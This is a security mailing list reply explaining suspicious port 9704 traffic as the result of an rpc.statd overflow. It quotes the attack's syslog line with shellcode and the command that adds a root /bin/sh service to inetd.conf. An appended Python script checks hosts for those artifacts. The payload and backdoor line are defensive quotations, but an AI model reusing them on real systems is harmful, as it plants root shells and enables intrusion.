Security Incidents mailing list archives
Re: Port 9704
From: Graeme Fowler <graeme.f () WEBFUSION CO UK>
Date: Thu, 12 Oct 2000 09:45:18 +0100
Derek K wrote:
> I'm seeing a lot of traffic from 2 mailservers - it's going out on port
> 9704 and going in on another box's 9704. I'm suspicious, and don't find
> any references to it around. The 9704->9704 makes me wonder if it isn't a
> hack of some kind.

Yup. 9704 is the port added to inetd by a pretty well-known overflow for rpc.statd:

Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00bffff7 0400000000000000000000000000000000000000000000000bffff7050000bffff706000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000 0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90 <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 <90><90 <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83>
<8D>^( <83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 1<83> <88>F'<88>F*<83> <88>F<89>F+, <89><8D>N<8D>V<80>1<89>@<80>/bin /sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

...and BONK! they have a rootshell running on 9704.

See http://www.securityfocus.com/bid/1480

I'd let the owners know, pronto. Alternatively if you have any control over them, get them unplugged.

Regards

Graeme

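
Added example, not part of the original post: a small host check for the two artifacts the message above describes, an inetd entry that runs a shell directly and the rpc.statd SM_MON syslog line. The sample data is constructed (abbreviated from the quoted log), and the function names and the list of shell names are assumptions made for this illustration.

```python
import re

# Constructed sample data, abbreviated from the entries quoted in the post.
SAMPLE_INETD = """\
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
# 9999 stream tcp nowait root /bin/sh sh -i
9704 stream tcp nowait root /bin/sh sh -i
"""
SAMPLE_SYSLOG = """\
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E<90><90>/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Aug XX 17:20:01 victim CRON[512]: (root) CMD (run-parts /etc/cron.hourly)
"""

SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "ash"}  # assumed list
STATD_RE = re.compile(r"rpc\.statd\[\d+\]: SM_MON request for hostname containing '/'")

def inetd_shell_services(conf_text):
    """Return (line_no, service, user, server) for entries whose server is a shell."""
    hits = []
    for no, line in enumerate(conf_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and commented-out services are inactive
        fields = line.split()  # service socktype proto wait user server args...
        if len(fields) < 6:
            continue
        service, user, server = fields[0], fields[4], fields[5]
        user = user.split(".")[0].split(":")[0]  # strip optional group suffix
        if server.rsplit("/", 1)[-1] in SHELLS:
            hits.append((no, service, user, server))
    return hits

def statd_exploit_attempts(log_text):
    """Return one record per rpc.statd SM_MON '/' hostname log line."""
    hits = []
    for line in log_text.splitlines():
        if STATD_RE.search(line):
            hits.append({
                "prefix": line[:40],
                "nop_sled": "<90><90>" in line,           # escaped 0x90 run
                "inetd_write": "/etc/inetd.conf" in line,  # payload edits inetd.conf
            })
    return hits

if __name__ == "__main__":
    print(inetd_shell_services(SAMPLE_INETD))
    print(statd_exploit_attempts(SAMPLE_SYSLOG))
```

A syslog hit alone only shows an attempt was logged; a matching shell entry in inetd.conf shows the payload's command actually ran.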
Current thread:
- Port 9704 Derek K. (Oct 11)
- Re: Port 9704 Harry Behrens (Oct 12)
- Re: Port 9704 Graeme Fowler (Oct 12)
- Re: Port 9704 Jose Nazario (Oct 12)